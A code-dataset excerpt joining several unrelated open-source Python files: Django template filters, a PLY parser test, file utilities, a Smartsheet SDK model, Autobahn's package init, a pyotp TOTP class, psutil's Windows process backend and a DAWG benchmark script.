return ugettext("%s GB") % filesize_number_format(bytes / (1024 * 1024 * 1024))
if bytes < 1024 * 1024 * 1024 * 1024 * 1024:
return ugettext("%s TB") % filesize_number_format(bytes / (1024 * 1024 * 1024 * 1024))
return ugettext("%s PB") % filesize_number_format(bytes / (1024 * 1024 * 1024 * 1024 * 1024))
@register.filter(is_safe=False)
def pluralize(value, arg=u's'):
"""
Returns a plural suffix if the value is not 1. By default, 's' is used as
the suffix:
* If value is 0, vote{{ value|pluralize }} displays "0 votes".
* If value is 1, vote{{ value|pluralize }} displays "1 vote".
* If value is 2, vote{{ value|pluralize }} displays "2 votes".
If an argument is provided, that string is used instead:
* If value is 0, class{{ value|pluralize:"es" }} displays "0 classes".
* If value is 1, class{{ value|pluralize:"es" }} displays "1 class".
* If value is 2, class{{ value|pluralize:"es" }} displays "2 classes".
If the provided argument contains a comma, the text before the comma is
used for the singular case and the text after the comma is used for the
plural case:
* If value is 0, cand{{ value|pluralize:"y,ies" }} displays "0 candies".
* If value is 1, cand{{ value|pluralize:"y,ies" }} displays "1 candy".
* If value is 2, cand{{ value|pluralize:"y,ies" }} displays "2 candies".
"""
if not u',' in arg:
arg = u',' + arg
bits = arg.split(u',')
if len(bits) > 2:
return u''
singular_suffix, plural_suffix = bits[:2]
try:
if int(value) != 1:
return plural_suffix
except ValueError: # Invalid string that's not a number.
pass
except TypeError: # Value isn't a string or a number; maybe it's a list?
try:
if len(value) != 1:
return plural_suffix
except TypeError: # len() of unsized object.
pass
return singular_suffix
@register.filter("phone2numeric", is_safe=True)
def phone2numeric_filter(value):
"""Takes a phone number and converts it in to its numerical equivalent."""
return phone2numeric(value)
@register.filter(is_safe=True)
def pprint(value):
"""A wrapper around pprint.pprint -- for debugging, really."""
try:
return pformat(value)
except Exception, e:
return u"Error in formatting: %s" % force_unicode(e, errors="replace")
| bsd-3-clause |
lastweek/gem5 | ext/ply/test/yacc_error1.py | 174 | 1530 | # -----------------------------------------------------------------------------
# yacc_error1.py
#
# Bad p_error() function
# -----------------------------------------------------------------------------
import sys
if ".." not in sys.path: sys.path.insert(0,"..")
import ply.yacc as yacc
from calclex import tokens
# Parsing rules
precedence = (
('left','PLUS','MINUS'),
('left','TIMES','DIVIDE'),
('right','UMINUS'),
)
# dictionary of names
names = { }
def p_statement_assign(t):
'statement : NAME EQUALS expression'
names[t[1]] = t[3]
def p_statement_expr(t):
'statement : expression'
print(t[1])
def p_expression_binop(t):
'''expression : expression PLUS expression
| expression MINUS expression
| expression TIMES expression
| expression DIVIDE expression'''
if t[2] == '+' : t[0] = t[1] + t[3]
elif t[2] == '-': t[0] = t[1] - t[3]
elif t[2] == '*': t[0] = t[1] * t[3]
elif t[2] == '/': t[0] = t[1] / t[3]
def p_expression_uminus(t):
'expression : MINUS expression %prec UMINUS'
t[0] = -t[2]
def p_expression_group(t):
'expression : LPAREN expression RPAREN'
t[0] = t[2]
def p_expression_number(t):
'expression : NUMBER'
t[0] = t[1]
def p_expression_name(t):
'expression : NAME'
try:
t[0] = names[t[1]]
except LookupError:
print("Undefined name '%s'" % t[1])
t[0] = 0
def p_error(t,s):
print("Syntax error at '%s'" % t.value)
yacc.yacc()
| bsd-3-clause |
spatialexplore/idn_vam_wfp | python/utilities/directoryUtils.py | 1 | 3199 | #!/usr/bin/env python
"""
SYNOPSIS
TODO helloworld [-h,--help] [-v,--verbose] [--version]
DESCRIPTION
TODO This describes how to use this script. This docstring
will be printed by the script if there is an error or
if the user requests help (-h or --help).
EXAMPLES
TODO: Show some examples of how to use this script.
EXIT STATUS
TODO: List exit codes
AUTHOR
TODO: Name <name@example.org>
LICENSE
This script is in the public domain, free from copyrights or restrictions.
VERSION
$Id$
"""
__author__ = 'rochelle'
import os
#from os import listdir, path
import gzip
import re
def listMatchingFiles(base_dir, pattern):
# build list of files matching pattern
fileList = []
if not pattern:
pattern = '.*'
if os.path.exists(base_dir):
_all_files = os.listdir(base_dir)
for _fn in _all_files:
_pth = os.path.join(base_dir, _fn)
if not os.path.isdir(_pth):
if re.match(pattern, _fn):
fileList.append(_pth)
return fileList
def buildFileList(base_dir, extension='.tif'):
fileList = []
if os.path.exists(base_dir):
all_files = os.listdir(base_dir)
for fname in all_files:
pth = os.path.join(base_dir, fname)
if os.path.isdir(pth):
# skip directories
continue
else:
# file
fn, ext = os.path.splitext(fname)
if ext == extension:
fileList.append(pth)
return fileList
def getMatchingFiles(base_dir, filter):
fileList = []
if os.path.exists(base_dir):
all_files = os.listdir(base_dir)
for f in all_files:
pth = os.path.join(base_dir, f)
if not os.path.isdir(pth):
# check file against filter
if re.match(filter, f):
fileList.append(pth)
return fileList
def getNewFilename(filename, prefix, ext, pattern, new_pattern):
f= os.path.basename(filename)
m = re.match(pattern, f)
new_filename = re.sub(pattern,
lambda match: new_pattern.format(
prefix = prefix,
datestamp = match.group('datestamp'),
ext = ext)
if match.group('datestamp') else f, f)
return os.path.join(os.path.dirname(filename), new_filename)
def unzipFiles(base_dir, extension='.gz'):
filesList = buildFileList(base_dir, extension)
for fl in filesList:
if not os.path.isdir(fl):
with gzip.open(fl, 'rb') as in_file:
s = in_file.read()
# Now store the uncompressed data
path_to_store = fl[:-3] # remove the '.gz' from the filename
# store uncompressed file data from 's' variable
with open(path_to_store, 'wb') as f:
f.write(s)
return 0
def unzipFile(fname, extension='.gz'):
inF = gzip.open(fname, 'rb')
outfilename = fname[:-3]
outF = open(outfilename, 'wb')
outF.write( inF.read() )
inF.close()
outF.close()
return outfilename | mit |
smartsheet-platform/smartsheet-python-sdk | smartsheet/models/column.py | 1 | 6169 | # pylint: disable=C0111,R0902,R0904,R0912,R0913,R0915,E1101
# Smartsheet Python SDK.
#
# Copyright 2018 Smartsheet.com, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from .auto_number_format import AutoNumberFormat
from .contact import Contact
from .enums import ColumnType, Symbol, SystemColumnType
from ..types import *
from ..util import serialize
from ..util import deserialize
class Column(object):
"""Smartsheet Column data model."""
def __init__(self, props=None, base_obj=None):
"""Initialize the Column model."""
self._base = None
if base_obj is not None:
self._base = base_obj
self._auto_number_format = TypedObject(AutoNumberFormat)
self._contact_options = TypedList(Contact)
self._description = String()
self._format_ = String()
self._formula = String()
self._hidden = Boolean()
self._id_ = Number()
self._index = Number()
self._locked = Boolean()
self._locked_for_user = Boolean()
self._options = TypedList(str)
self._primary = Boolean()
self._symbol = EnumeratedValue(Symbol)
self._system_column_type = EnumeratedValue(SystemColumnType)
self._tags = TypedList(str)
self._title = String()
self._type_ = EnumeratedValue(ColumnType)
self._width = Number()
self._validation = Boolean()
self._version = Number()
if props:
deserialize(self, props)
# requests package Response object
self.request_response = None
self.__initialized = True
def __getattr__(self, key):
if key == 'format':
return self.format_
elif key == 'id':
return self.id_
elif key == 'type':
return self.type_
else:
raise AttributeError(key)
def __setattr__(self, key, value):
if key == 'format':
self.format_ = value
elif key == 'id':
self.id_ = value
elif key == 'type':
self.type_ = value
else:
super(Column, self).__setattr__(key, value)
@property
def auto_number_format(self):
return self._auto_number_format.value
@auto_number_format.setter
def auto_number_format(self, value):
self._auto_number_format.value = value
@property
def contact_options(self):
return self._contact_options
@contact_options.setter
def contact_options(self, value):
self._contact_options.load(value)
@property
def description(self):
return self._description.value
@description.setter
def description(self, value):
self._description.value = value
@property
def format_(self):
return self._format_.value
@format_.setter
def format_(self, value):
self._format_.value = value
@property
def formula(self):
return self._formula.value
@formula.setter
def formula(self, value):
self._formula.value = value
@property
def hidden(self):
return self._hidden.value
@hidden.setter
def hidden(self, value):
self._hidden.value = value
@property
def id_(self):
return self._id_.value
@id_.setter
def id_(self, value):
self._id_.value = value
@property
def index(self):
return self._index.value
@index.setter
def index(self, value):
self._index.value = value
@property
def locked(self):
return self._locked.value
@locked.setter
def locked(self, value):
self._locked.value = value
@property
def locked_for_user(self):
return self._locked_for_user.value
@locked_for_user.setter
def locked_for_user(self, value):
self._locked_for_user.value = value
@property
def options(self):
return self._options
@options.setter
def options(self, value):
self._options.load(value)
@property
def primary(self):
return self._primary.value
@primary.setter
def primary(self, value):
self._primary.value = value
@property
def symbol(self):
return self._symbol
@symbol.setter
def symbol(self, value):
self._symbol.set(value)
@property
def system_column_type(self):
return self._system_column_type
@system_column_type.setter
def system_column_type(self, value):
self._system_column_type.set(value)
@property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.load(value)
@property
def title(self):
return self._title.value
@title.setter
def title(self, value):
self._title.value = value
@property
def type_(self):
return self._type_
@type_.setter
def type_(self, value):
self._type_.set(value)
@property
def width(self):
return self._width.value
@width.setter
def width(self, value):
self._width.value = value
@property
def validation(self):
return self._validation.value
@validation.setter
def validation(self, value):
self._validation.value = value
@property
def version(self):
return self._version.value
@version.setter
def version(self, value):
self._version.value = value;
def to_dict(self):
return serialize(self)
def to_json(self):
return json.dumps(self.to_dict())
def __str__(self):
return self.to_json()
| apache-2.0 |
gijs/AutobahnPython | autobahn/autobahn/__init__.py | 4 | 1121 | ###############################################################################
##
## Copyright 2011,2012 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
try:
import pkg_resources
version = pkg_resources.require("Autobahn")[0].version
except:
## i.e. no setuptools or no package installed ..
version = "?.?.?"
import util
import useragent
import httpstatus
import utf8validator
import xormasker
import websocket
import resource
import prefixmap
import wamp
| apache-2.0 |
vvoody/pyotp | src/pyotp/totp.py | 5 | 1988 | from pyotp.otp import OTP
import datetime
import time
import urllib
class TOTP(OTP):
def __init__(self, *args, **kwargs):
"""
@option options [Integer] interval (30) the time interval in seconds for OTP
This defaults to 30 which is standard.
"""
self.interval = kwargs.pop('interval', 30)
super(TOTP, self).__init__(*args, **kwargs)
def at(self, for_time):
"""
Accepts either a Unix timestamp integer or a Time object.
Time objects will be adjusted to UTC automatically
@param [Time/Integer] time the time to generate an OTP for
"""
if not isinstance(for_time, datetime.datetime):
for_time = datetime.datetime.fromtimestamp(int(for_time))
return self.generate_otp(self.timecode(for_time))
def now(self):
"""
Generate the current time OTP
@return [Integer] the OTP as an integer
"""
return self.generate_otp(self.timecode(datetime.datetime.now()))
def verify(self, otp, for_time=None):
"""
Verifies the OTP passed in against the current time OTP
@param [String/Integer] otp the OTP to check against
"""
if for_time is None:
for_time = datetime.datetime.now()
return otp == self.at(for_time)
def provisioning_uri(self, name):
"""
Returns the provisioning URI for the OTP
This can then be encoded in a QR Code and used
to provision the Google Authenticator app
@param [String] name of the account
@return [String] provisioning uri
"""
return 'otpauth://totp/%(name)s?secret=%(secret)s' % {
'name': urllib.quote(name, safe='@'),
'secret': self.secret,
}
def timecode(self, for_time):
i = time.mktime(for_time.timetuple())
return int(i / self.interval)
| mit |
zmallen/pupy | pupy/packages/windows/x86/psutil/_pswindows.py | 66 | 19166 | #!/usr/bin/env python
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Windows platform implementation."""
import errno
import functools
import os
import sys
from collections import namedtuple
from . import _common
from . import _psutil_windows as cext
from ._common import conn_tmap, usage_percent, isfile_strict
from ._common import sockfam_to_enum, socktype_to_enum
from ._compat import PY3, xrange, lru_cache, long
from ._psutil_windows import (ABOVE_NORMAL_PRIORITY_CLASS,
BELOW_NORMAL_PRIORITY_CLASS,
HIGH_PRIORITY_CLASS,
IDLE_PRIORITY_CLASS,
NORMAL_PRIORITY_CLASS,
REALTIME_PRIORITY_CLASS)
if sys.version_info >= (3, 4):
import enum
else:
enum = None
# process priority constants, import from __init__.py:
# http://msdn.microsoft.com/en-us/library/ms686219(v=vs.85).aspx
__extra__all__ = ["ABOVE_NORMAL_PRIORITY_CLASS", "BELOW_NORMAL_PRIORITY_CLASS",
"HIGH_PRIORITY_CLASS", "IDLE_PRIORITY_CLASS",
"NORMAL_PRIORITY_CLASS", "REALTIME_PRIORITY_CLASS",
"CONN_DELETE_TCB",
"AF_LINK",
]
# --- module level constants (gets pushed up to psutil module)
CONN_DELETE_TCB = "DELETE_TCB"
WAIT_TIMEOUT = 0x00000102 # 258 in decimal
ACCESS_DENIED_SET = frozenset([errno.EPERM, errno.EACCES,
cext.ERROR_ACCESS_DENIED])
if enum is None:
AF_LINK = -1
else:
AddressFamily = enum.IntEnum('AddressFamily', {'AF_LINK': -1})
AF_LINK = AddressFamily.AF_LINK
TCP_STATUSES = {
cext.MIB_TCP_STATE_ESTAB: _common.CONN_ESTABLISHED,
cext.MIB_TCP_STATE_SYN_SENT: _common.CONN_SYN_SENT,
cext.MIB_TCP_STATE_SYN_RCVD: _common.CONN_SYN_RECV,
cext.MIB_TCP_STATE_FIN_WAIT1: _common.CONN_FIN_WAIT1,
cext.MIB_TCP_STATE_FIN_WAIT2: _common.CONN_FIN_WAIT2,
cext.MIB_TCP_STATE_TIME_WAIT: _common.CONN_TIME_WAIT,
cext.MIB_TCP_STATE_CLOSED: _common.CONN_CLOSE,
cext.MIB_TCP_STATE_CLOSE_WAIT: _common.CONN_CLOSE_WAIT,
cext.MIB_TCP_STATE_LAST_ACK: _common.CONN_LAST_ACK,
cext.MIB_TCP_STATE_LISTEN: _common.CONN_LISTEN,
cext.MIB_TCP_STATE_CLOSING: _common.CONN_CLOSING,
cext.MIB_TCP_STATE_DELETE_TCB: CONN_DELETE_TCB,
cext.PSUTIL_CONN_NONE: _common.CONN_NONE,
}
if enum is not None:
class Priority(enum.IntEnum):
ABOVE_NORMAL_PRIORITY_CLASS = ABOVE_NORMAL_PRIORITY_CLASS
BELOW_NORMAL_PRIORITY_CLASS = BELOW_NORMAL_PRIORITY_CLASS
HIGH_PRIORITY_CLASS = HIGH_PRIORITY_CLASS
IDLE_PRIORITY_CLASS = IDLE_PRIORITY_CLASS
NORMAL_PRIORITY_CLASS = NORMAL_PRIORITY_CLASS
REALTIME_PRIORITY_CLASS = REALTIME_PRIORITY_CLASS
globals().update(Priority.__members__)
scputimes = namedtuple('scputimes', ['user', 'system', 'idle'])
svmem = namedtuple('svmem', ['total', 'available', 'percent', 'used', 'free'])
pextmem = namedtuple(
'pextmem', ['num_page_faults', 'peak_wset', 'wset', 'peak_paged_pool',
'paged_pool', 'peak_nonpaged_pool', 'nonpaged_pool',
'pagefile', 'peak_pagefile', 'private'])
pmmap_grouped = namedtuple('pmmap_grouped', ['path', 'rss'])
pmmap_ext = namedtuple(
'pmmap_ext', 'addr perms ' + ' '.join(pmmap_grouped._fields))
ntpinfo = namedtuple(
'ntpinfo', ['num_handles', 'ctx_switches', 'user_time', 'kernel_time',
'create_time', 'num_threads', 'io_rcount', 'io_wcount',
'io_rbytes', 'io_wbytes'])
# set later from __init__.py
NoSuchProcess = None
AccessDenied = None
TimeoutExpired = None
@lru_cache(maxsize=512)
def _win32_QueryDosDevice(s):
return cext.win32_QueryDosDevice(s)
def _convert_raw_path(s):
# convert paths using native DOS format like:
# "\Device\HarddiskVolume1\Windows\systemew\file.txt"
# into: "C:\Windows\systemew\file.txt"
if PY3 and not isinstance(s, str):
s = s.decode('utf8')
rawdrive = '\\'.join(s.split('\\')[:3])
driveletter = _win32_QueryDosDevice(rawdrive)
return os.path.join(driveletter, s[len(rawdrive):])
def py2_strencode(s, encoding=sys.getfilesystemencoding()):
if PY3 or isinstance(s, str):
return s
else:
try:
return s.encode(encoding)
except UnicodeEncodeError:
# Filesystem codec failed, return the plain unicode
# string (this should never happen).
return s
# --- public functions
def virtual_memory():
"""System virtual memory as a namedtuple."""
mem = cext.virtual_mem()
totphys, availphys, totpagef, availpagef, totvirt, freevirt = mem
#
total = totphys
avail = availphys
free = availphys
used = total - avail
percent = usage_percent((total - avail), total, _round=1)
return svmem(total, avail, percent, used, free)
def swap_memory():
"""Swap system memory as a (total, used, free, sin, sout) tuple."""
mem = cext.virtual_mem()
total = mem[2]
free = mem[3]
used = total - free
percent = usage_percent(used, total, _round=1)
return _common.sswap(total, used, free, percent, 0, 0)
def disk_usage(path):
"""Return disk usage associated with path."""
try:
total, free = cext.disk_usage(path)
except WindowsError:
if not os.path.exists(path):
msg = "No such file or directory: '%s'" % path
raise OSError(errno.ENOENT, msg)
raise
used = total - free
percent = usage_percent(used, total, _round=1)
return _common.sdiskusage(total, used, free, percent)
def disk_partitions(all):
"""Return disk partitions."""
rawlist = cext.disk_partitions(all)
return [_common.sdiskpart(*x) for x in rawlist]
def cpu_times():
"""Return system CPU times as a named tuple."""
user, system, idle = cext.cpu_times()
return scputimes(user, system, idle)
def per_cpu_times():
"""Return system per-CPU times as a list of named tuples."""
ret = []
for cpu_t in cext.per_cpu_times():
user, system, idle = cpu_t
item = scputimes(user, system, idle)
ret.append(item)
return ret
def cpu_count_logical():
"""Return the number of logical CPUs in the system."""
return cext.cpu_count_logical()
def cpu_count_physical():
"""Return the number of physical CPUs in the system."""
return cext.cpu_count_phys()
def boot_time():
"""The system boot time expressed in seconds since the epoch."""
return cext.boot_time()
def net_connections(kind, _pid=-1):
"""Return socket connections. If pid == -1 return system-wide
connections (as opposed to connections opened by one process only).
"""
if kind not in conn_tmap:
raise ValueError("invalid %r kind argument; choose between %s"
% (kind, ', '.join([repr(x) for x in conn_tmap])))
families, types = conn_tmap[kind]
rawlist = cext.net_connections(_pid, families, types)
ret = set()
for item in rawlist:
fd, fam, type, laddr, raddr, status, pid = item
status = TCP_STATUSES[status]
fam = sockfam_to_enum(fam)
type = socktype_to_enum(type)
if _pid == -1:
nt = _common.sconn(fd, fam, type, laddr, raddr, status, pid)
else:
nt = _common.pconn(fd, fam, type, laddr, raddr, status)
ret.add(nt)
return list(ret)
def net_if_stats():
ret = cext.net_if_stats()
for name, items in ret.items():
name = py2_strencode(name)
isup, duplex, speed, mtu = items
if hasattr(_common, 'NicDuplex'):
duplex = _common.NicDuplex(duplex)
ret[name] = _common.snicstats(isup, duplex, speed, mtu)
return ret
def net_io_counters():
ret = cext.net_io_counters()
return dict([(py2_strencode(k), v) for k, v in ret.items()])
def net_if_addrs():
ret = []
for items in cext.net_if_addrs():
items = list(items)
items[0] = py2_strencode(items[0])
ret.append(items)
return ret
def users():
"""Return currently connected users as a list of namedtuples."""
retlist = []
rawlist = cext.users()
for item in rawlist:
user, hostname, tstamp = item
user = py2_strencode(user)
nt = _common.suser(user, None, hostname, tstamp)
retlist.append(nt)
return retlist
pids = cext.pids
pid_exists = cext.pid_exists
disk_io_counters = cext.disk_io_counters
ppid_map = cext.ppid_map # not meant to be public
def wrap_exceptions(fun):
"""Decorator which translates bare OSError and WindowsError
exceptions into NoSuchProcess and AccessDenied.
"""
@functools.wraps(fun)
def wrapper(self, *args, **kwargs):
try:
return fun(self, *args, **kwargs)
except OSError as err:
# support for private module import
if NoSuchProcess is None or AccessDenied is None:
raise
if err.errno in ACCESS_DENIED_SET:
raise AccessDenied(self.pid, self._name)
if err.errno == errno.ESRCH:
raise NoSuchProcess(self.pid, self._name)
raise
return wrapper
class Process(object):
"""Wrapper class around underlying C implementation."""
__slots__ = ["pid", "_name", "_ppid"]
def __init__(self, pid):
self.pid = pid
self._name = None
self._ppid = None
@wrap_exceptions
def name(self):
"""Return process name, which on Windows is always the final
part of the executable.
"""
# This is how PIDs 0 and 4 are always represented in taskmgr
# and process-hacker.
if self.pid == 0:
return "System Idle Process"
elif self.pid == 4:
return "System"
else:
try:
# Note: this will fail with AD for most PIDs owned
# by another user but it's faster.
return py2_strencode(os.path.basename(self.exe()))
except AccessDenied:
return py2_strencode(cext.proc_name(self.pid))
@wrap_exceptions
def exe(self):
# Note: os.path.exists(path) may return False even if the file
# is there, see:
# http://stackoverflow.com/questions/3112546/os-path-exists-lies
# see https://github.com/giampaolo/psutil/issues/414
# see https://github.com/giampaolo/psutil/issues/528
if self.pid in (0, 4):
raise AccessDenied(self.pid, self._name)
return py2_strencode(_convert_raw_path(cext.proc_exe(self.pid)))
@wrap_exceptions
def cmdline(self):
ret = cext.proc_cmdline(self.pid)
if PY3:
return ret
else:
return [py2_strencode(s) for s in ret]
def ppid(self):
try:
return ppid_map()[self.pid]
except KeyError:
raise NoSuchProcess(self.pid, self._name)
def _get_raw_meminfo(self):
try:
return cext.proc_memory_info(self.pid)
except OSError as err:
if err.errno in ACCESS_DENIED_SET:
# TODO: the C ext can probably be refactored in order
# to get this from cext.proc_info()
return cext.proc_memory_info_2(self.pid)
raise
@wrap_exceptions
def memory_info(self):
# on Windows RSS == WorkingSetSize and VSM == PagefileUsage
# fields of PROCESS_MEMORY_COUNTERS struct:
# http://msdn.microsoft.com/en-us/library/windows/desktop/
# ms684877(v=vs.85).aspx
t = self._get_raw_meminfo()
return _common.pmem(t[2], t[7])
@wrap_exceptions
def memory_info_ex(self):
return pextmem(*self._get_raw_meminfo())
def memory_maps(self):
try:
raw = cext.proc_memory_maps(self.pid)
except OSError as err:
# XXX - can't use wrap_exceptions decorator as we're
# returning a generator; probably needs refactoring.
if err.errno in ACCESS_DENIED_SET:
raise AccessDenied(self.pid, self._name)
if err.errno == errno.ESRCH:
raise NoSuchProcess(self.pid, self._name)
raise
else:
for addr, perm, path, rss in raw:
path = _convert_raw_path(path)
addr = hex(addr)
yield (addr, perm, path, rss)
@wrap_exceptions
def kill(self):
return cext.proc_kill(self.pid)
@wrap_exceptions
def send_signal(self, sig):
os.kill(self.pid, sig)
@wrap_exceptions
def wait(self, timeout=None):
if timeout is None:
timeout = cext.INFINITE
else:
# WaitForSingleObject() expects time in milliseconds
timeout = int(timeout * 1000)
ret = cext.proc_wait(self.pid, timeout)
if ret == WAIT_TIMEOUT:
# support for private module import
if TimeoutExpired is None:
raise RuntimeError("timeout expired")
raise TimeoutExpired(timeout, self.pid, self._name)
return ret
@wrap_exceptions
def username(self):
if self.pid in (0, 4):
return 'NT AUTHORITY\\SYSTEM'
return cext.proc_username(self.pid)
@wrap_exceptions
def create_time(self):
# special case for kernel process PIDs; return system boot time
if self.pid in (0, 4):
return boot_time()
try:
return cext.proc_create_time(self.pid)
except OSError as err:
if err.errno in ACCESS_DENIED_SET:
return ntpinfo(*cext.proc_info(self.pid)).create_time
raise
@wrap_exceptions
def num_threads(self):
return ntpinfo(*cext.proc_info(self.pid)).num_threads
@wrap_exceptions
def threads(self):
rawlist = cext.proc_threads(self.pid)
retlist = []
for thread_id, utime, stime in rawlist:
ntuple = _common.pthread(thread_id, utime, stime)
retlist.append(ntuple)
return retlist
@wrap_exceptions
def cpu_times(self):
try:
ret = cext.proc_cpu_times(self.pid)
except OSError as err:
if err.errno in ACCESS_DENIED_SET:
nt = ntpinfo(*cext.proc_info(self.pid))
ret = (nt.user_time, nt.kernel_time)
else:
raise
return _common.pcputimes(*ret)
@wrap_exceptions
def suspend(self):
return cext.proc_suspend(self.pid)
@wrap_exceptions
def resume(self):
return cext.proc_resume(self.pid)
@wrap_exceptions
def cwd(self):
if self.pid in (0, 4):
raise AccessDenied(self.pid, self._name)
# return a normalized pathname since the native C function appends
# "\\" at the and of the path
path = cext.proc_cwd(self.pid)
return py2_strencode(os.path.normpath(path))
@wrap_exceptions
def open_files(self):
if self.pid in (0, 4):
return []
ret = set()
# Filenames come in in native format like:
# "\Device\HarddiskVolume1\Windows\systemew\file.txt"
# Convert the first part in the corresponding drive letter
# (e.g. "C:\") by using Windows's QueryDosDevice()
raw_file_names = cext.proc_open_files(self.pid)
for _file in raw_file_names:
_file = _convert_raw_path(_file)
if isfile_strict(_file):
if not PY3:
_file = py2_strencode(_file)
ntuple = _common.popenfile(_file, -1)
ret.add(ntuple)
return list(ret)
@wrap_exceptions
def connections(self, kind='inet'):
return net_connections(kind, _pid=self.pid)
@wrap_exceptions
def nice_get(self):
value = cext.proc_priority_get(self.pid)
if enum is not None:
value = Priority(value)
return value
@wrap_exceptions
def nice_set(self, value):
return cext.proc_priority_set(self.pid, value)
# available on Windows >= Vista
if hasattr(cext, "proc_io_priority_get"):
@wrap_exceptions
def ionice_get(self):
return cext.proc_io_priority_get(self.pid)
@wrap_exceptions
def ionice_set(self, value, _):
if _:
raise TypeError("set_proc_ionice() on Windows takes only "
"1 argument (2 given)")
if value not in (2, 1, 0):
raise ValueError("value must be 2 (normal), 1 (low) or 0 "
"(very low); got %r" % value)
return cext.proc_io_priority_set(self.pid, value)
@wrap_exceptions
def io_counters(self):
try:
ret = cext.proc_io_counters(self.pid)
except OSError as err:
if err.errno in ACCESS_DENIED_SET:
nt = ntpinfo(*cext.proc_info(self.pid))
ret = (nt.io_rcount, nt.io_wcount, nt.io_rbytes, nt.io_wbytes)
else:
raise
return _common.pio(*ret)
@wrap_exceptions
def status(self):
suspended = cext.proc_is_suspended(self.pid)
if suspended:
return _common.STATUS_STOPPED
else:
return _common.STATUS_RUNNING
@wrap_exceptions
def cpu_affinity_get(self):
def from_bitmask(x):
return [i for i in xrange(64) if (1 << i) & x]
bitmask = cext.proc_cpu_affinity_get(self.pid)
return from_bitmask(bitmask)
@wrap_exceptions
def cpu_affinity_set(self, value):
def to_bitmask(l):
if not l:
raise ValueError("invalid argument %r" % l)
out = 0
for b in l:
out |= 2 ** b
return out
# SetProcessAffinityMask() states that ERROR_INVALID_PARAMETER
# is returned for an invalid CPU but this seems not to be true,
# therefore we check CPUs validy beforehand.
allcpus = list(range(len(per_cpu_times())))
for cpu in value:
if cpu not in allcpus:
if not isinstance(cpu, (int, long)):
raise TypeError(
"invalid CPU %r; an integer is required" % cpu)
else:
raise ValueError("invalid CPU %r" % cpu)
bitmask = to_bitmask(value)
cext.proc_cpu_affinity_set(self.pid, bitmask)
@wrap_exceptions
def num_handles(self):
try:
return cext.proc_num_handles(self.pid)
except OSError as err:
if err.errno in ACCESS_DENIED_SET:
return ntpinfo(*cext.proc_info(self.pid)).num_handles
raise
@wrap_exceptions
def num_ctx_switches(self):
ctx_switches = ntpinfo(*cext.proc_info(self.pid)).ctx_switches
# only voluntary ctx switches are supported
return _common.pctxsw(ctx_switches, 0)
| bsd-3-clause |
moonlet/DAWG | bench/speed.py | 4 | 8857 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals, division
import random
import string
import timeit
import os
import zipfile
import struct
#import pstats
#import cProfile
import dawg
def words100k():
zip_name = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
'words100k.txt.zip'
)
zf = zipfile.ZipFile(zip_name)
txt = zf.open(zf.namelist()[0]).read().decode('utf8')
return txt.splitlines()
def random_words(num):
russian = 'абвгдеёжзиклмнопрстуфхцчъыьэюя'
alphabet = '%s%s' % (russian, string.ascii_letters)
return [
"".join([random.choice(alphabet) for x in range(random.randint(1,15))])
for y in range(num)
]
def truncated_words(words):
return [word[:3] for word in words]
def prefixes1k(words, prefix_len):
words = [w for w in words if len(w) >= prefix_len]
every_nth = int(len(words)/1000)
_words = [w[:prefix_len] for w in words[::every_nth]]
return _words[:1000]
def leet_words(words, replaces):
for key, value in replaces.items():
words = [w.replace(key, value) for w in words]
return words
WORDS100k = words100k()
MIXED_WORDS100k = truncated_words(WORDS100k)
NON_WORDS100k = random_words(100000)
PREFIXES_3_1k = prefixes1k(WORDS100k, 3)
PREFIXES_5_1k = prefixes1k(WORDS100k, 5)
PREFIXES_8_1k = prefixes1k(WORDS100k, 8)
PREFIXES_15_1k = prefixes1k(WORDS100k, 15)
LEET_REPLACES = {
'o': '0',
'O': '0',
'u': '0',
'l': '1',
'i': '1',
'e': '3',
'E': '3',
'A': '4',
'a': '4',
'h': '4',
's': 'z',
}
LEET_50k = leet_words(WORDS100k[:50000], LEET_REPLACES)
def format_result(key, value, text_width):
key = key.ljust(text_width)
print(" %s %s" % (key, value))
def bench(name, timer, descr='M ops/sec', op_count=0.1, repeats=3, runs=5,
text_width=33):
try:
times = []
for x in range(runs):
times.append(timer.timeit(repeats))
def op_time(time):
return op_count*repeats / time
val = "%0.3f%s" % (op_time(min(times)), descr)
format_result(name, val, text_width)
except (AttributeError, TypeError) as e:
format_result(name, "not supported", text_width)
def create_dawg():
words = words100k()
return dawg.DAWG(words)
def create_bytes_dawg():
words = words100k()
values = [struct.pack(str('<H'), len(word)) for word in words]
return dawg.BytesDAWG(zip(words, values))
def create_record_dawg():
words = words100k()
values = [ [len(word)] for word in words]
return dawg.RecordDAWG(str('<H'), zip(words, values))
def create_int_dawg():
words = words100k()
values = [len(word) for word in words]
return dawg.IntDAWG(zip(words, values))
def create_leet_dawg():
return dawg.DAWG(LEET_50k)
def benchmark():
print('\n====== Benchmarks (100k unique unicode words) =======\n')
tests = [
('__getitem__ (hits)', "for word in WORDS100k: data[word]", 'M ops/sec', 0.1, 3),
('get() (hits)', "for word in WORDS100k: data.get(word)", 'M ops/sec', 0.1, 3),
('get() (misses)', "for word in NON_WORDS_10k: data.get(word)", 'M ops/sec', 0.01, 5),
('__contains__ (hits)', "for word in WORDS100k: word in data", 'M ops/sec', 0.1, 3),
('__contains__ (misses)', "for word in NON_WORDS100k: word in data", 'M ops/sec', 0.1, 3),
('items()', 'list(data.items())', ' ops/sec', 1, 1),
('keys()', 'list(data.keys())', ' ops/sec', 1, 1),
